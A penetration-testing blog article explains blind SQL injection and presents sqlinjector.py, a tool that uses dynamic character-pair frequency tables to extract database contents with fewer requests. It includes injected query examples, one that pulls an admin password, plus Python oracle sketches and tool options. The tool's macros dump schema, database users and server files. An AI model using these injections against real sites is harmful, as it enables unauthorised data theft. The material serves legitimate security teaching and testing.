[Editor's note: In this excellent article, Mark Baggett covers a technique he's implemented in a brand new tool for making blind SQL injection penetration testing and ethical hacking far more efficient using dynamic character frequency tables. The article describes his approach, covers a new tool he's created, and features a video demo. Awesome stuff for a penetration tester's toolbox, Mark! -Ed.]
By Mark Baggett
Look at this DATABASE filled with glamorous merchandise and fabulous prices just waiting to be extracted on WHEEL OF FORTUNE. What, did you hear that differently than I did? How can the wheel of fortune be used to extract data from a database? The player that knows the statistical probability of characters appearing around other characters will win on Wheel of Fortune. The same is true for a penetration tester doing blind SQL injection. Let's take a look at how using the frequency of character pairs can aid in attacks like blind SQL injection. But first, we need to understand blind SQL injection.
Blind SQL Injection
Blind SQL injection attacks inject TRUE/FALSE questions into a database query and measure the results of that query based upon how the server responds. They are especially useful when the vulnerable application will not let us directly see the output of the SQL we inject to the back-end database. On the surface, it may seem a showstopper for penetration testers who can't see the output generated by their queries. But, by asking a large number of TRUE/FALSE questions, we can make the database leak its contents to us. The result is blind SQL injection.
Consider the following queries. "SELECT lastname FROM users WHERE firstname="Mark" and 1=1;". This will return the lastname field in every record in the database where the firstname is Mark. Because "and 1=1" is always true, it does not affect the results of the first part of the query (because, logically "anything AND true" will take on the value of that anything). However, the query "SELECT lastname FROM users WHERE firstname="Mark" and 1=0;" will return no records because "AND 1=0" is always false and thus will match no records in the database (anything AND false is always false).
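The AND logic above can be reproduced locally. What follows is a minimal sketch using Python's built-in sqlite3 module and an in-memory database. The rows are invented for illustration, and the statements are built by plain string concatenation only so the appended clause stays visible.

```python
import sqlite3

# In-memory database with made-up rows, purely for illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (firstname TEXT, lastname TEXT)")
conn.executemany(
    "INSERT INTO users VALUES (?, ?)",
    [("Mark", "Orlando"), ("Ed", "Example")],
)

base = "SELECT lastname FROM users WHERE firstname='Mark'"

# "anything AND true" keeps the original result set.
rows_true = conn.execute(base + " AND 1=1").fetchall()
# "anything AND false" matches no records.
rows_false = conn.execute(base + " AND 1=0").fetchall()

print(rows_true)
print(rows_false)
```

The first query returns the matching row and the second returns an empty list, which is the TRUE/FALSE signal the rest of the technique relies on.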
Using this technique, we can ask the database TRUE/FALSE questions. Instead of injecting a simple question like "is one equal to zero" we can inject questions like "Is the first letter of the query 'SELECT password FROM admins LIMIT 1;' equal to the letter 'a'." To do so, our query looks something like this: SELECT lastname FROM users WHERE firstname="MARK" and (SUBSTRING((SELECT password FROM admins limit 1),1,1)='a');
If the first admin's password starts with the letter 'a', the query returns the lastname of every user in our system whose firstname is "MARK". If the password doesn't start with an 'a', the query returns nothing. Even though the original query didn't give us direct access to the admins table and we cannot directly see the results of our injected query, we can still ascertain the values in the database by the presence or absence of a known string (in my example, "Orlando") in the response.
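To make the TRUE/FALSE oracle concrete, here is a rough sketch that simulates the vulnerable page with sqlite3. Everything in it is an assumption made for the demo: the table contents, the password value, the HTML produced by the hypothetical page_for() function, and the use of SQLite's substr() in place of SUBSTRING. Only the idea of checking the response for a match string comes from the text above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (firstname TEXT, lastname TEXT);
    CREATE TABLE admins (password TEXT);
    INSERT INTO users VALUES ('MARK', 'Orlando');
    INSERT INTO admins VALUES ('apple123');
""")

def page_for(injected_condition):
    """Stand-in for the vulnerable page: renders the query rows as HTML."""
    sql = ("SELECT lastname FROM users WHERE firstname='MARK' AND ("
           + injected_condition + ")")
    rows = conn.execute(sql).fetchall()
    return "<ul>" + "".join(f"<li>{r[0]}</li>" for r in rows) + "</ul>"

def is_true(injected_condition, match="Orlando"):
    """The answer is TRUE when the match string shows up in the response."""
    return match in page_for(injected_condition)

def first_char_is(ch):
    # SQLite's substr() plays the role of SUBSTRING in this demo.
    cond = f"substr((SELECT password FROM admins LIMIT 1),1,1)='{ch}'"
    return is_true(cond)

print(first_char_is("a"), first_char_is("b"))
```

The attacker never sees the password column. The only signal is whether "Orlando" appears in the page.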
Most blind SQL injection tools use a technique similar to this to extract all of the data from the database. They vary in how they choose the letter to compare to the substring of the response. For example, some tools will simply brute force the letter. "Is the first letter A? Is it B? Is it C?", and so on. Others will repeatedly cut the character set in half. "Is it less than M? Is it less than F?", etc. Some tools will compare the binary bits in the ASCII value of the letters. But today, no widely used publicly available tools rely on the Wheel of Fortune technique to guess the next letter. I'd like to change that.
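The difference between the first two strategies is easy to measure with a simulated oracle. The sketch below is illustrative only: the make_oracle() helper, the 26-letter character set, and the request counter are assumptions standing in for real HTTP requests.

```python
import string

CHARSET = string.ascii_lowercase  # 26 candidates, kept small for the example

def make_oracle(secret_char):
    """Return (ask, counter); ask(op, ch) answers one TRUE/FALSE question."""
    counter = {"requests": 0}

    def ask(op, ch):
        counter["requests"] += 1
        return secret_char == ch if op == "=" else secret_char < ch

    return ask, counter

def linear_guess(ask):
    """Brute force: is it 'a'? is it 'b'? ..."""
    for ch in CHARSET:
        if ask("=", ch):
            return ch
    return None

def bisect_guess(ask):
    """Repeatedly cut the character set in half with 'less than' questions."""
    lo, hi = 0, len(CHARSET) - 1
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if ask("<", CHARSET[mid]):
            hi = mid - 1
        else:
            lo = mid
    return CHARSET[lo]

ask, counter = make_oracle("u")
linear_result, linear_requests = linear_guess(ask), counter["requests"]

ask, counter = make_oracle("u")
bisect_result, bisect_requests = bisect_guess(ask), counter["requests"]

print(linear_result, linear_requests, bisect_result, bisect_requests)
```

Bisection needs at most five questions for 26 letters regardless of the answer, while brute force depends entirely on where the letter falls in the guessing order. That ordering is exactly what a frequency table improves.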
Character Frequency Tables
Last year I wrote a simple SQL injection tool that used character frequency tables based on a paper posted to http://www.exploit-db.com/papers/13696/. The paper, written by Dmitry Evteev and Vladimir Vorontsov, talks about using static frequency tables to extract data from SQL Injection attacks and is a very good read. The basic concept is this: if I have just learned that the first character in the name of the database is a "Q", then what is the next letter going to be? Intuitively you probably guessed that the next character would likely be "U". And you would be correct almost all of the time in the English language. There is a 99% chance that a "U" will be the character to follow a "Q" for English text. While not as drastic as the "QU" combination, there are high probabilities associated with most of the other characters. For example there is approximately a 39% chance that the character after a "T" will be an "H" in normal English text. So if we know the first character we can use these probabilities to guess what the next character will be. The technique allowed us to issue fewer requests to a database to extract data from a site vulnerable to SQL Injection. This adds stealth and speed to the pen-tester's bag of tricks. But the use of static character frequency tables has its limitations.
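As an illustration of the static-table idea, the following sketch counts character pairs in a sample string and uses the counts to order guesses for the next character. The sample sentence and the function names are made up for the example. This is not the table format used in the paper or in my tool.

```python
from collections import Counter, defaultdict
import string

def build_pair_table(text):
    """Map each character to a Counter of the characters that follow it."""
    table = defaultdict(Counter)
    text = text.lower()
    for prev, nxt in zip(text, text[1:]):
        table[prev][nxt] += 1
    return table

def guess_order(table, prev, charset=string.ascii_lowercase):
    """Candidates for the next character, most frequent follower first."""
    seen = [ch for ch, _ in table[prev].most_common() if ch in charset]
    rest = [ch for ch in charset if ch not in seen]
    return seen + rest

sample = "the quick queen quietly quit the quiz"
table = build_pair_table(sample)
order = guess_order(table, "q")
print(order[:3])
```

With this table, a tool that has just learned a "q" tries "u" first and gets the answer in a single request instead of walking the alphabet.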
Dynamic Character Frequency Tables
First off, if I think I am querying a field in a database that contains only numbers, then attempting alphabetic characters is a waste of time. Second, many character frequency tables are for generic English text, and databases often contain product names, company names, and things other than written text. While the "TH" pair is strongly coupled in text, the word "THE" isn't as frequent inside of databases that don't contain free-form text. While static frequency tables will work, we can be more efficient if our frequency tables are built specifically for the target system and change dynamically as the tool learns about the target database. To do this right, I need to start with multiple frequency tables: some with digits, some with alphanumeric characters, and some with all characters, just like we use when brute-forcing passwords. I also need a way to make my tables specific to the target I am engaging and have them DYNAMICALLY learn from the information already extracted from the database, so that the tool makes the most intelligent guess possible for the next character.
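The payoff of learning as you go can be shown with a small simulation. This is a sketch under stated assumptions, not the logic inside my tool: the column names, the character set, and the "one request per candidate tried" cost model are all invented for the demo, and the table starts empty rather than from a prebuilt file.

```python
from collections import Counter, defaultdict
import string

CHARSET = string.ascii_lowercase + string.digits + "_"

def extract(words, learn):
    """Simulate extracting `words` one character at a time; return total guesses."""
    table = defaultdict(Counter)      # starts empty: no prior knowledge
    total = 0
    for word in words:
        prev = ""                     # "" marks the start of a value
        for actual in word:
            ranked = [c for c, _ in table[prev].most_common()]
            order = ranked + [c for c in CHARSET if c not in ranked]
            total += order.index(actual) + 1   # one request per candidate tried
            if learn:
                table[prev][actual] += 1       # fold the new pair back into the table
            prev = actual
    return total

names = ["user_id", "user_name", "user_email", "order_id", "order_total"]
static_guesses = extract(names, learn=False)
dynamic_guesses = extract(names, learn=True)
print(static_guesses, dynamic_guesses)
```

Because schema names repeat prefixes such as "user_" and "order_", the learning run spends far fewer guesses once the first value has been extracted. Restricting CHARSET to digits for a numeric field would shrink the search further.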
To that end, I developed a Python class to manage character frequency tables and a simple SQL Injection tool to demonstrate the use of the tables. The purpose of the tool is to demonstrate the validity of the attack methodology. It isn't intended, nor does it try, to offer the level of functionality we get from tools like SQLMAP. But perhaps the FreqCounter objects inside my tool might benefit the developers of other tools. I welcome them to incorporate my technique and code in their projects.
The "FreqCounter" class is a highly documented object that is used to build targeted frequency counter tables and dynamically adjust the character frequencies as it learns new words from the database itself. If you run my sqlinjector.py tool with a "-b" option, you are dropped into a Python instance so you can build customized frequency tables for your target.
To use it, first, obtain a text-only version of your target's website that we can use to help tune our initial frequency tables to the target environment. There are several ways to do this, but a simple way using the text-based Lynx browser relies on the following two commands.
$ wget -r http://targetwebsite.com
$ grep -h -R "" * | lynx --stdin --dump --nolist --nostatus --notitle > targetwebsitetext.txt
Next, we start the sqlinjector.py script in "build mode". Then we load one of the prebuilt frequency tables and modify it by having it tally up the characters in our file containing the target's website, weighting each character pair 1,000 times to boost them in the existing table, in effect training our tables according to our website. The steps for doing this are shown in the following screenshot, and are described in detail below:
STEP 1) After invoking the Python interpreter to run my sqlinjector.py tool with the -b option, we create a new object called fq. This fq object contains all the methods needed to manage a frequency character database.
STEP 2) The load() method loads an existing frequency table into the object. In this case we are loading the character frequency table stored in "sqlinjector-normal.freq" file into our object.
STEP 3) Here we tally up the character frequencies in the text document "targetwebsitetext.txt" and count each character pair in the file 1000 times so that they will be more heavily weighted than normal text. With this option, if an A follows an S in the file "targetwebsitetext.txt" it will be counted as though an A followed an S 1000 times.
STEP 4) We save our new targeted character frequency table for use.
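The four steps can be approximated in a few lines of plain Python. The PairTable class below is a hypothetical stand-in written for this illustration. It is not the FreqCounter API, its method signatures are assumptions, and the JSON file it writes is not the .freq format used by the tool.

```python
import json
import os
import tempfile
from collections import Counter, defaultdict

class PairTable:
    """Hypothetical stand-in for illustration; NOT the tool's FreqCounter class."""

    def __init__(self):
        self.pairs = defaultdict(Counter)

    def tally(self, text, weight=1):
        """Count every adjacent character pair in `text`, `weight` times each."""
        for prev, nxt in zip(text, text[1:]):
            self.pairs[prev][nxt] += weight

    def save(self, path):
        with open(path, "w", encoding="utf-8") as fh:
            json.dump(self.pairs, fh)

    def load(self, path):
        with open(path, encoding="utf-8") as fh:
            data = json.load(fh)
        self.pairs = defaultdict(Counter, {k: Counter(v) for k, v in data.items()})

fq = PairTable()
fq.tally("the theory of the thing")   # generic text, weight 1
fq.tally("sans", weight=1000)         # target-specific text, heavily weighted

path = os.path.join(tempfile.mkdtemp(), "example.freq")
fq.save(path)

restored = PairTable()
restored.load(path)
print(restored.pairs["n"].most_common(1))
```

After the weighted tally, the pairs seen in the target text dominate their contexts, so "s" outranks "g" as the most likely character after "n" even though the generic text suggested otherwise.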
The FreqCounter has several other methods that are useful for fine-tuning your tables. Running help(FreqCounter) will point you in the right direction. Now we are ready to launch our attack using our modified frequency tables. Next we point the sqlinjector.py script at the target URL and configure the required options.
The SQLINJECTOR tool
Here is an example of how we can use these frequency tables with the SQLINJECTOR script.
The -s option allows you to provide a match string that the program will use to identify when a "TRUE" value is returned by the blind SQL injection attack. For example, the tool will ask the database, "Is the first letter of your table name = 'Q'?". If it sees the string our command includes after the -s option, it will assume that the answer was yes.
The -v option tells the tool to be verbose in its output. A -vv can also be used to be very verbose. Being very verbose is useful when troubleshooting, as the tool will tell you exactly which URLs it requested.
The -f option tells the tool which character frequency table to use. In this case, we want to use the table we created in our earlier steps. The program assumes the actual file name will be in the format "sqlinjector-<tablename>.freq".
The program will automatically "learn" the character frequencies from table names, column names, and other text elements as they are extracted from the database and tune its frequency tables accordingly. By default, each learned character will be promoted by 5 places in its respective table. For example, if, during our attack, the tool sees that the letter "F" follows the letter "Q", then the count for "F" will be raised to 1 point higher than that of the character currently ranked 5 places above "F". The learning weight can be changed with the -l (lowercase L, not a dash-one) option. So, "-l 30" will cause learned characters to be promoted 30 places in their list and "-l 0" will turn off learning during the attack, essentially using a static table.
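The promotion rule described above can be sketched as follows. This is one reading of the description, not a copy of the tool's code: the promote() function, the dictionary layout, and the sample counts are assumptions made for the example.

```python
def promote(counts, ch, places=5):
    """Raise `ch` about `places` positions in the ranking held in `counts`.

    `counts` maps character -> count for one "previous character" context.
    """
    if places <= 0:
        return  # learning disabled: behaves like a static table
    ranked = sorted(counts, key=counts.get, reverse=True)
    if ch not in counts:
        counts[ch] = 0
        ranked.append(ch)
    pos = ranked.index(ch)
    target = ranked[max(pos - places, 0)]
    if target != ch:
        # One point above the character currently `places` positions higher.
        counts[ch] = counts[target] + 1

# Made-up follower counts for the context "q".
after_q = {"u": 990, "a": 5, "e": 4, "i": 3, "o": 2, "r": 1, "f": 0}
promote(after_q, "f", places=5)
ranking = sorted(after_q, key=after_q.get, reverse=True)
print(ranking)
```

Promoting by rank rather than by a fixed count lets one observation move a rare character up quickly without letting it overtake an overwhelmingly common one such as "u" after "q".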
The last option is a target URL along with a SQL command to execute on the vulnerable site. It is important to note that my tool does not find SQL injection flaws in the first place. This is a tool for exploiting them by extracting data from a site that is vulnerable to SQL injection. Therefore, you must know where the SQL injection point is prior to using the tool.
In my example, I am injecting a macro called "gettables" into a vulnerable "filter" field on the site http://172.16.124.120/classlist.php?. Sqlinjector.py will execute any select statement that is valid for the target URL, but it also provides a few macros for your convenience. The SQL statement or macro must be provided between two carets (^) at the point of injection. The "gettables" macro will extract a copy of all of the user-defined tables and column names inside the database schema in a comma-delimited list format, "table-column". The system provides a couple of other macros, including "getusers", "getfile=/path/file", and "getdba", which can retrieve a list of MySQL users, files from the file system, and the database administrators respectively.
Let's take a look at the tool in action. The following videos demonstrate the use of the sqlinjector.py tool and the build mode for the creation of custom frequency tables.
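To illustrate the caret convention, here is a small sketch of how a URL with a ^...^ marker could be split at the injection point and rebuilt around a TRUE/FALSE condition. The function names, the example host, and the URL-encoding step are assumptions for this illustration. The tool's own parsing may differ.

```python
import re
from urllib.parse import quote

def split_injection(url):
    """Split a URL at its ^...^ marker into (prefix, payload, suffix)."""
    m = re.search(r"\^([^^]*)\^", url)
    if m is None:
        raise ValueError("no ^...^ injection marker found")
    return url[:m.start()], m.group(1), url[m.end():]

def build_url(url, condition):
    """Replace the marked payload with a URL-encoded condition."""
    prefix, _payload, suffix = split_injection(url)
    return prefix + quote(condition) + suffix

# Hypothetical target; the parameter name "filter" follows the example above.
target = "http://target.example/classlist.php?filter=^gettables^"
prefix, payload, suffix = split_injection(target)
probe = build_url(target, "1=1")
print(payload, probe)
```

Marking the injection point explicitly keeps the rest of the URL untouched, so the same template can be reused for every TRUE/FALSE question sent to the server.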
The use of frequency counter tables and heuristics has other potential applications as well. For example, the keyboard autocorrect on our smartphones could benefit from knowing the most likely character to follow the last character typed. Keystroke loggers that only pick up parts of words, whether from vibration in a smartphone's accelerometer, pulses in electrical noise, or vibrations on a pane of glass, can use these tables to fill in the missing letters. Perhaps using heuristics combined with character pair frequencies to analyze protocols, we can identify the difference between HTTP and XML as we parse packets. These are all interesting possible applications of this Wheel of Fortune technique that others may already be working on.
By dynamically learning and adjusting the character frequency tables, my tool can extract data in as little as 4 guesses per character. The more structured the data, with common names and repeating values, the faster we can extract it. If the data is unstructured, containing random characters (such as hashes in a database), then this technique is equivalent to brute forcing the data. However, most of the information targeted in penetration tests tends to be structured. In the right circumstances, the technique requires fewer requests than conventional blind SQL injection methods, making it both stealthier and significantly faster. I hope you find it useful.
If you would like to play with the sqlinjector.py tool and use it in your own work, you can check out a copy of the tool with SVN as follows:
$ svn checkout http://freqcounter-sqlinjector.googlecode.com/svn/trunk/ sqlinjector
Shameless Self Promotion
Follow me on twitter using @markbaggett